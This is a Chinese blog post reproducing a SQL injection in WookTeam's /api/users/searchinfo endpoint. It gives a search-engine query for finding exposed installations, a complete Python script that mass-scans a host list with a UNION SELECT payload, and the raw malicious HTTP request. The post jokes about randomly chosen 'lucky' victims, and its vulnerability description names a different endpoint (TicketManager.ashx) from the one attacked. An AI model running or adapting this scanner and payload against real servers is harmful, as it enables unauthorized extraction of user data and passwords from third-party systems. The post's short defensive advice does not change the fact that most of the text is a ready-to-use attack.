【漏洞复现】WookTeam searchinfo SQL注入漏洞

于 2024-08-19 17:33:25 发布
阅读量501 收藏 7
点赞数 18
分类专栏: 漏洞复现 文章标签: sql 数据库 计算机网络 网络安全 安全 web安全 网络
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_54799594/article/details/141330135
版权

           声明:本文档或演示材料仅用于教育和教学目的。如果任何个人或组织利用本文档中的信息进行非法活动,将与本文档的作者或发布者无关。

一、漏洞描述

WookTeam 是一支专注于打造高质量软件产品的软件开发团队。他们凭借深厚的技术背景和丰富的项目经验,擅长运用敏捷开发方法,强调团队合作与持续交付。WookTeam 注重用户体验,追求代码的质量和可维护性,并利用最新的技术栈和工具来提高开发效率。他们致力于为客户提供卓越的软件解决方案,助力企业实现数字化转型和业务创新。团队成员具备出色的沟通能力和责任心,能够迅速适应变化,不断学习和提升。然而,他们的接口TicketManager.ashx存在SQL注入漏洞,攻击者可以通过这个漏洞获取数据库中的敏感信息。

二、资产收集

1.使用网络空间测绘引擎搜索

鹰图检索:title="Wookteam"

2.使用poc批量扫描

import urllib.request
import urllib3
from urllib.parse import urljoin,quote
import argparse
import ssl
import re

# 创建一个未经验证的SSL上下文,以允许不安全的HTTPS请求
ssl._create_default_https_context = ssl._create_unverified_context
# 禁用urllib3中的InsecureRequestWarning警告
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

def read_file(file_path):
    """
    读取文件中的URL列表
    :param file_path: 文件路径
    :return: URL列表
    """
    with open(file_path, 'r') as file:
        urls = file.read().splitlines()
    return urls

def check(url):
    """
    检查目标URL是否存在SQL注入漏洞
    :param url: 目标URL
    :return: 如果存在漏洞,返回True
    """
    url = url.rstrip("/")
    # 构造恶意请求URL,尝试执行SQL注入攻击
    target = url + "/api/users/searchinfo?where[username]=1%27%29+UNION+ALL+SELECT+NULL%2CCONCAT%280x7e%2Cmd5%28123456%29%2C0x7e%29%2CNULL%2CNULL%2CNULL%23"
    headers = {
        "User-Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36",
    }
    try:
        # 发送带有恶意载荷的GET请求
        response = urllib.request.Request(target, headers=headers, method="GET", unverifiable=True)
        res = urllib.request.urlopen(response)
        status_code = res.getcode()
        content = res.read().decode()
        # 检查响应状态码和内容中是否包含预期的关键字,以判断是否存在漏洞
        if status_code == 200 and 'username' in content and 'e10adc3949ba59abbe56e057f20f883e' in content:
            print(f"\033[31mDiscovered:{url}: WookTeam_searchinfo_SQLInject!\033[0m")
            return True
    except Exception as e:
        pass

if __name__ == "__main__":
    parser = argparse.ArgumentParser()
    parser.add_argument("-u", "--url", help="URL")
    parser.add_argument("-f", "--txt", help="file")
    args = parser.parse_args()
    url = args.url
    txt = args.txt
    if url:
        check(url)
    elif txt:
        urls = read_file(txt)
        for url in urls:
            check(url)
    else:
        print("help")

cmd运行poc脚本:python poc.py -f host.txt

 随机寻找的幸运儿

三、漏洞复现 

1.构造数据包

1.构造数据包:


GET /api/users/searchinfo?where[username]=1%27%29+UNION+ALL+SELECT+NULL%2CCONCAT%280x7e%2Cmd5%28123456%29%2C0x7e%29%2CNULL%2CNULL%2CNULL%23 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: keep-alive

2.数据包分析 

  1. 这是一个HTTP GET请求的数据包,用于查询用户信息。下面是对这个数据包的详细解析:

    1. 请求行(Request Line):
       - `GET`: 表示这是一个GET请求,用于从服务器获取数据。
       - `/api/users/searchinfo?where[username]=1%27%29+UNION+ALL+SELECT+NULL%2CCONCAT%280x7e%2Cmd5%28123456%29%2C0x7e%29%2CNULL%2CNULL%2CNULL%23`: 这是请求的URL,包含了一个查询参数`where[username]`,其值为一个SQL注入攻击的尝试。这个值试图执行一个UNION查询,将原始查询的结果与另一个查询的结果合并,从而获取更多的信息。
       - `HTTP/1.1`: 表示使用的是HTTP协议的版本1.1。

    2. 请求头(Request Headers):
       - `Host: x.x.x.x`: 指定了请求的目标服务器地址。
       - `User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36`: 描述了发起请求的客户端的信息,包括浏览器类型和版本。
       - `Connection: keep-alive`: 表示希望保持连接持续活跃,以便在同一TCP连接上发送多个请求。

    需要注意的是,这个请求中包含了一个SQL注入攻击的尝试,这是一种常见的安全漏洞。攻击者试图通过修改查询参数的值来执行恶意的SQL代码,以获取未经授权的数据或影响数据库的行为。为了防止这种攻击,应该对用户输入进行严格的验证和过滤,并使用参数化查询或预编译语句来避免直接拼接SQL语句。

3.结束跑路

1.构造数据包username=md5(123456)

每篇一言:​​​​​​​如果你有梦想,就要守护它。

Cityミ slaves
关注
  • 18
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
WookTeam searchinfo SQL注入漏洞复现
0xSec
08-13 405
WookTeam /api/users/searchinfo接口存在SQL注入漏洞,未经身份验证的恶意攻击者利用 SQL 注入漏洞获取数据库中的信息(例如管理员后台密码、站点用户个人信息)之外,攻击者甚至可以在高权限下向服务器写入命令,进一步获取服务器系统权限。
SQLServer数据库实用语法
12-17
### SQL Server 数据库实用语法详解 #### 一、存储过程创建与使用 在 SQL Server 数据库管理系统中,存储过程是一种预编译的 SQL 代码集合,它可以被当作一个单独的对象来调用,从而提高应用程序的执行效率并简化...
WookTeam searchinfo SQL注入漏洞
weixin_43167326的博客
08-14 815
WookTeam /api/users/searchinfo 接口存在SQL注入漏洞,未经身份验证的恶意攻击者利用 SQL 注入漏洞获取数据库中的信息(例如管理员后台密码、站点用户个人信息)之外,攻击者甚至可以在高权限下向服务器写入命令,进一步获取服务器系统权限。
HW漏洞威胁情报第十九天|HW情报
weixin_43167326的博客
08-14 796
技术文章仅供参考,此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他!!!
wookteam协作平台api/users/searchinfo接口存在SQL注入漏洞 附POC
nnn2188185的博客
08-15 469
微信公众号搜索:南风漏洞复现文库 该文章 南风漏洞复现文库 公众号首发wookteam协作平台。
历年HW已公开漏洞专集!(目前漏洞库更新至84个,Goby持续更新...)
m0_46699477的博客
07-11 921
历年HW已公开漏洞专集!(目前漏洞库更新至84个,Goby持续更新...)。 截至2024年7月11日,Goby红队版已扩充以下历年HW已公开POC漏洞库,本次更新**84**个
HW漏洞威胁情报第二十天|HW情报
weixin_43167326的博客
08-15 1076
技术文章仅供参考,此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他!!!
sql日记
qq_43473129的博客
09-22 263
sql实战操作: explain查看sql执行计划 EXPLAIN SELECT sql_no_cache count(*) FROM user_info WHERE unit_id in(32012000,32012000,32009000,32006000,32001213); 查看表中的索引 show index from table_name; 给已有的表添加索引: ALTER TABLE `table_name` ADD INDEX index_name(column) ALTER TABLE
sqlserver查询补全时间_Sqlserver查询性能分析
weixin_32302013的博客
01-14 136
查询性能分析(执行结果分析)1、方法在查询窗口中输入以下命令dbccdropcleanbuffers--注释:清除数据dbccfreeproccache--注释:清除缓存这是为了每次查询时,不会因为重复查询对结果有干扰,接着在窗口中输入以下命令。Setstatisticsioon--注释:开启系统资源使用统计Setstatisticstimeon--注释:开启执行时间统计然后在窗口中...
SQLServer 实用语法大全
AricZhou
01-25 1613
1、将表名作为参数的存储过程 eg: create proc s_Table_SearchInfo  @TableName nvarchar(100)  AS   Begin declare @value nvarchar(50),                 @sql nvarchar(1000)  set @sql= ' select * from ' + @TableNa
C# 公共类文档包含Sql、Excel、Xml、GDI、窗体冻结解冻、图片水印压缩编码、正则表达式、反射操作等,各辅助类封装完美
12-03
查询信息实体类(SearchInfo.cs)7.类型(例如:int,string,double)转换(SmartDataReader.cs)8.Sql命令操作函数(可用于安装程序的时候数据库脚本执行)(SqlScriptHelper.cs)----------Device--------------1....
infosearch:在这个项目中,我将使用elasticsearch解析RSS新闻
05-15
在本项目"infosearch"中,开发者旨在利用Elasticsearch这一强大的搜索引擎来处理和解析RSS新闻数据。Elasticsearch是一个基于Lucene的分布式、RESTful风格的搜索和数据分析引擎,能够提供实时、可扩展的数据存储、...
匹兔(p2 search)资源搜索神器
08-27
[软件介绍] 匹兔(p2 search),名字原于软件采用p2p 技术进行网络资源搜索,故起名 "匹兔".软件根据电驴ed2k协议,采用节点直接获取的技术,直接搜索p2p网络的资源。搜索范围比较广,默认支持搜索各种资源,如影视,图片...
利用python对mysql表做全局模糊搜索并分页实例
09-08
dataSql = f"select * from {tableName} {searchInfo} limit {limit1}, {limit2}" cursor.execute(dataSql) # 将查询结果转化为字典列表 data = [dict(zip(columns, row)) for row in cursor.fetchall()] ...
SQL FOREIGN KEY 约束
m0_50736744的博客
08-16 404
SQL FOREIGN KEY 约束一个表中的 FOREIGN KEY 指向另一个表中的 UNIQUE KEY(唯一约束的键)。
Prostgresql的Timescaledb插件/扩展部署
weixin_45697805的博客
08-14 246
背景:研发需求,需要把docker部署得postgresql迁移到新的节点并要求再本地部署,提前查看数据库需要那些插件,并进行安装,docker部署的默认有插件。
4.1 SQL的起源与发展
在路上的专栏
08-16 870
SQL(结构化查询语言)是数据库管理的基石,自20世纪70年代诞生以来,它不断发展和演化,成为全球最广泛使用的数据查询语言。本文将通过生动的故事和易于理解的语言,带你了解SQL的起源、发展历程及其对现代数据库管理的深远影响。文章内容既适合数据库新手,也对专业人士具有参考价值。
SQL - 基础大汇总
最新发布
心如冰清,天塌不惊
08-16 400
【代码】数据库 - 基础。
使用 sql server创建视图SearchInfo查询借阅记录中的借阅编号、读者证件号、图书编号、书名、作者、出版社、借阅时间、应还时间、操作员, 保存为一个CreateView.sql文件;
05-12
你可以按照以下步骤创建视图SearchInfo: 1. 打开 SQL Server Management Studio,连接到你所需要的数据库。 2. 在查询窗口中输入以下 SQL 语句: ``` CREATE VIEW SearchInfo AS SELECT br.BorrowID, r.ReaderID, b.BookID, b.BookName, b.Author, b.Publisher, br.BorrowTime, br.DueTime, br.Operator FROM BorrowRecords br JOIN Books b ON br.BookID = b.BookID JOIN Readers r ON br.ReaderID = r.ReaderID; ``` 以上语句中,我们使用了 JOIN 操作符将 BorrowRecords、Books 和 Readers 三个表连接起来,从而获取借阅记录中的相关信息。 3. 将以上 SQL 语句保存为一个名为 CreateView.sql 的文件。 4. 在查询窗口中执行 CreateView.sql 文件,即可创建名为 SearchInfo 的视图。 你现在可以使用以下 SQL 语句查询 SearchInfo 视图中的数据: ``` SELECT * FROM SearchInfo; ```
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Cityミ slaves

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值